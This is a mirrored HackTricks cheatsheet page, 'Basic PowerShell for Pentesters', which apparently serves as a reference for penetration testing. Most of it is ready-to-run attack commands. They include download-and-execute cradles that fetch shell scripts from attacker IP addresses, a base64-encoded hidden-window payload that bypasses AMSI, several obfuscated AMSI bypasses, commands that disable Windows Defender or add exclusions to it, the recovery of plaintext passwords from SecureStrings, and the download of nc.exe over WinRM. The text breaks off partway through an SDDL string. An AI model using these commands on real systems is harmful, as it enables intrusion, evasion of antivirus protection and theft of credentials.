daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (30626B)


      1 ---
      2 title: "Basic PowerShell for Pentesters"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/basic-powershell-for-pentesters/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/basic-powershell-for-pentesters/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Basic PowerShell for Pentesters
     14 
     15 ## Default PowerShell locations
     16 
     17 ```bash
     18 C:\windows\syswow64\windowspowershell\v1.0\powershell
     19 C:\Windows\System32\WindowsPowerShell\v1.0\powershell
     20 ```
     21 
     22 ## Basic PS commands to start
     23 
     24 ```bash
     25 Get-Help * #List everything loaded
     26 Get-Help process #List everything containing "process"
     27 Get-Help Get-Item -Full #Get full helpabout a topic
     28 Get-Help Get-Item -Examples #List examples
     29 Import-Module <modulepath>
     30 Get-Command -Module <modulename>
     31 ```
     32 
     33 ## Download & Execute
     34 
     35 ```bash
     36 echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
     37 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
     38 iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
     39 
     40 $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
     41 $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
     42 
     43 #https://twitter.com/Alh4zr3d/status/1566489367232651264
     44 #host a text record with your payload at one of your (unburned) domains and do this:
     45 powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
     46 ```
     47 
     48 ### Download & Execute in background with AMSI Bypass
     49 
     50 ```bash
     51 Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
     52 ```
     53 
     54 ### Using b64 from linux
     55 
     56 ```bash
     57 echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
     58 powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
     59 ```
     60 
     61 ## Download
     62 
     63 ### System.Net.WebClient
     64 
     65 ```bash
     66 (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
     67 ```
     68 
     69 ### Invoke-WebRequest
     70 
     71 ```bash
     72 Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
     73 ```
     74 
     75 ### Wget
     76 
     77 ```bash
     78 wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
     79 ```
     80 
     81 ### BitsTransfer
     82 
     83 ```bash
     84 Import-Module BitsTransfer
     85 Start-BitsTransfer -Source $url -Destination $output
     86 # OR
     87 Start-BitsTransfer -Source $url -Destination $output -Asynchronous
     88 ```
     89 
     90 ## Base64 Kali & EncodedCommand
     91 
     92 ```bash
     93 kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
     94 PS> powershell -EncodedCommand <Base64>
     95 ```
     96 
     97 ## [Execution Policy](../authentication-credentials-uac-and-efs/index.html#ps-execution-policy)
     98 
     99 ## [Constrained language](/hacktricks/windows-hardening/authentication-credentials-uac-and-efs/overview#powershell-constrained-language-mode)
    100 
    101 ## [AppLocker Policy](/hacktricks/windows-hardening/authentication-credentials-uac-and-efs/overview#applocker-policy)
    102 
    103 ## Enable WinRM (Remote PS)
    104 
    105 ```bash
    106 enable-psremoting -force #This enables winrm
    107 
    108 # Change NetWorkConnection Category to Private
    109 #Requires -RunasAdministrator
    110 
    111 Get-NetConnectionProfile |
    112   Where{ $_.NetWorkCategory -ne 'Private'} |
    113   ForEach {
    114     $_
    115     $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
    116   }
    117 ```
    118 
    119 ## Disable Defender
    120 
    121 ```bash
    122 # Check status
    123 Get-MpComputerStatus
    124 Get-MpPreference | select Exclusion* | fl #Check exclusions
    125 # Disable
    126 Set-MpPreference -DisableRealtimeMonitoring $true
    127 #To completely disable Windows Defender on a computer, use the command:
    128 New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
    129 # Set exclusion path
    130 Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
    131 Add-MpPreference -ExclusionPath (pwd)
    132 
    133 # Check exclusions configured via GPO
    134 Parse-PolFile .\Registry.pol
    135 
    136 KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
    137 ValueName : Exclusions_Paths
    138 ValueType : REG_DWORD
    139 ValueLength : 4
    140 ValueData : 1
    141 
    142 KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
    143 ValueName : C:\Windows\Temp
    144 ValueType : REG_SZ
    145 ValueLength : 4
    146 ValueData : 0
    147 ```
    148 
    149 ### AMSI bypass
    150 
    151 **`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.
    152 
    153 Therefore, the goal of the AMSI bypasses you will use is to **overwrite the instructions of that DLL in memory to make the detection useless**.
    154 
    155 **AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)
    156 
    157 ```bash
    158 # A Method
    159 [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
    160 
    161 # Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
    162 $A="5492868772801748688168747280728187173688878280688776828"
    163 $B="1173680867656877679866880867644817687416876797271"
    164 [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
    165 substring(($_*2),2))})-replace " " ).
    166 GetField([string](38..51|%{[char][int](29+($A+$B).
    167 substring(($_*2),2))})-replace " ",'NonPublic,Static').
    168 SetValue($null,$true)
    169 
    170 # Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
    171 [Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
    172 
    173 # Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
    174 &( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
    175 
    176 # Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
    177 ${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
    178 ${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
    179 ${1}.SetValue($null,$true)
    180 
    181 # Another Method
    182 $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
    183 $assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
    184 $field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
    185 $field.SetValue($null,$true)
    186 
    187 # AMSI Bypass in python
    188 https://fluidattacks.com/blog/amsi-bypass-python/
    189 
    190 # Testing for Amsi Bypass:
    191 https://github.com/rasta-mouse/AmsiScanBufferBypass
    192 
    193 # Amsi-Bypass-Powershell
    194 https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
    195 
    196 https://blog.f-secure.com/hunting-for-amsi-bypasses/
    197 https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
    198 https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
    199 https://slaeryan.github.io/posts/falcon-zero-alpha.html
    200 ```
    201 
    202 ### AMSI Bypass 2 - Managed API Call Hooking
    203 
    204 Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Introduction:<sup>[[1]](#references)</sup>
    205 
    206 This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.
    207 
    208 The steps performing API cal hooking of .NET methods are:<sup>[[1]](#references)</sup>
    209 
    210 1. Identify the target method to hook
    211 2. Define a method with the same function prototype as the target
    212 3. Use reflection to find the methods
    213 4. Ensure each method has been compiled
    214 5. Find the location of each method in memory
    215 6. Overwrite the target method with instructions pointing to our malicious method
    216 
    217 ### AMSI Bypass 3 - SeDebug Privilege
    218 
    219 [**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) you can see how with enough privileges to debug processes, you can spawn a powershell.exe process, debug it, monitor when it loads `amsi.dll` and disable it.<sup>[[2]](#references)</sup>
    220 
    221 ### AMSI Bypass - More Resources
    222 
    223 - Check the page about **[Bypassing AVs & AMSI](/hacktricks/windows-hardening/av-bypass)**
    224 - [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
    225 - [Amsi Bypass on Windows 11 In 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
    226 
    227 ## PS-History
    228 
    229 ```bash
    230 Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
    231 ```
    232 
    233 ## Find a newer files
    234 
    235 Options : `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
    236 
    237 ```bash
    238 # LastAccessTime:
    239 (gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
    240 
    241 # LastWriteTime:
    242 (gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
    243 ```
    244 
    245 ## Get permissions
    246 
    247 ```bash
    248 Get-Acl -Path "C:\Program Files\Vuln Services" | fl
    249 ```
    250 
    251 ## OS version and HotFixes
    252 
    253 ```bash
    254 [System.Environment]::OSVersion.Version #Current OS version
    255 Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
    256 Get-Hotfix -description "Security update" #List only "Security Update" patches
    257 ```
    258 
    259 ## Environment
    260 
    261 ```bash
    262 Get-ChildItem Env: | ft Key,Value -AutoSize #get all values
    263 $env:UserName @Get UserName value
    264 ```
    265 
    266 ## Other connected drives
    267 
    268 ```bash
    269 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
    270 ```
    271 
    272 ### Recycle Bin
    273 
    274 ```bash
    275 $shell = New-Object -com shell.application
    276 $rb = $shell.Namespace(10)
    277 $rb.Items()
    278 ```
    279 
    280 [https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)<sup>[[3]](#references)</sup>
    281 
    282 ## Domain Recon
    283 
    284 [Powerview](/hacktricks/windows-hardening/basic-powershell-for-pentesters/powerview)
    285 
    286 ## Users
    287 
    288 ```bash
    289 Get-LocalUser | ft Name,Enabled,Description,LastLogon
    290 Get-ChildItem C:\Users -Force | select Name
    291 ```
    292 
    293 ## Secure String to Plaintext
    294 
    295 ```bash
    296 $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
    297 $user = "HTB\Tom"
    298 $cred = New-Object System.management.Automation.PSCredential($user, $pass)
    299 $cred.GetNetworkCredential() | fl
    300 
    301 UserName       : Tom
    302 Password       : 1ts-mag1c!!!
    303 SecurePassword : System.Security.SecureString
    304 Domain         : HTB
    305 ```
    306 
    307 Or directly parsing form XML:
    308 
    309 ```bash
    310 $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
    311 
    312 UserName       : Tom
    313 Password       : 1ts-mag1c!!!
    314 SecurePassword : System.Security.SecureString
    315 Domain         : HTB
    316 ```
    317 
    318 ## SUDO
    319 
    320 ```bash
    321 #CREATE A CREDENTIAL OBJECT
    322 $pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
    323 $cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
    324 
    325 #For local:
    326 Start-Process -Credential ($cred)  -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
    327 
    328 #For WINRM
    329 #CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
    330 Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
    331 #DOWNLOAD nc.exe
    332 Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
    333 
    334 Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
    335 
    336 #Another method
    337 $secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
    338 $mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
    339 $computer = "<hostname>"
    340 ```
    341 
    342 ## Groups
    343 
    344 ```bash
    345 Get-LocalGroup | ft Name #All groups
    346 Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
    347 ```
    348 
    349 ## Clipboard
    350 
    351 ```bash
    352 Get-Clipboard
    353 ```
    354 
    355 Perform some clipboard monitoring using:
    356 
    357 - [https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Start-ClipboardMonitor.ps1](https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Start-ClipboardMonitor.ps1)
    358 - [https://github.com/slyd0g/SharpClipboard](https://github.com/slyd0g/SharpClipboard)
    359 
    360 ## Processes
    361 
    362 ```bash
    363 Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
    364 ```
    365 
    366 ## Services
    367 
    368 ```text
    369 Get-Service
    370 ```
    371 
    372 ## Password from secure string
    373 
    374 ```bash
    375 $pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
    376 $cred=new-object system.management.automation.pscredential("administrator", $pw)
    377 $cred.getnetworkcredential() | fl * #Get plaintext password
    378 ```
    379 
    380 ## Scheduled Tasks
    381 
    382 ```bash
    383 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
    384 ```
    385 
    386 ## Network
    387 
    388 ### Port Scan
    389 
    390 ```bash
    391 # Check Port or Single IP
    392 Test-NetConnection -Port 80 10.10.10.10
    393 
    394 # Check Port List in Single IP
    395 80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
    396 
    397 # Check Port Range in single IP
    398 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
    399 
    400 # Check Port List in IP Lists - 80,443,445,8080
    401 "10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
    402 
    403 ```
    404 
    405 ### Interfaces
    406 
    407 ```bash
    408 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
    409 Get-DnsClientServerAddress -AddressFamily IPv4 | ft
    410 ```
    411 
    412 ### Firewall
    413 
    414 ```bash
    415 Get-NetFirewallRule -Enabled True
    416 
    417 Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
    418 Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
    419 Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
    420 Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow
    421 
    422 # Open SSH to the world
    423 New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow
    424 
    425 # Get name, protocol, local and remote ports, remote address, enabled state, profile, and direction
    426 ## Change the initial filters to select a different direction or action
    427 Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property  DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
    428 ```
    429 
    430 ### Route
    431 
    432 ```bash
    433 route print
    434 ```
    435 
    436 ### ARP
    437 
    438 ```bash
    439 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
    440 ```
    441 
    442 ### Hosts
    443 
    444 ```bash
    445 Get-Content C:\WINDOWS\System32\drivers\etc\hosts
    446 ```
    447 
    448 ### Ping
    449 
    450 ```bash
    451 $ping = New-Object System.Net.Networkinformation.Ping
    452 1..254 | % { $ping.send("10.9.15.$_") | select address, status }
    453 ```
    454 
    455 ### SNMP
    456 
    457 ```bash
    458 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
    459 ```
    460 
    461 ## **Converting the SDDL String into a Readable Format**
    462 
    463 ```bash
    464 PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-2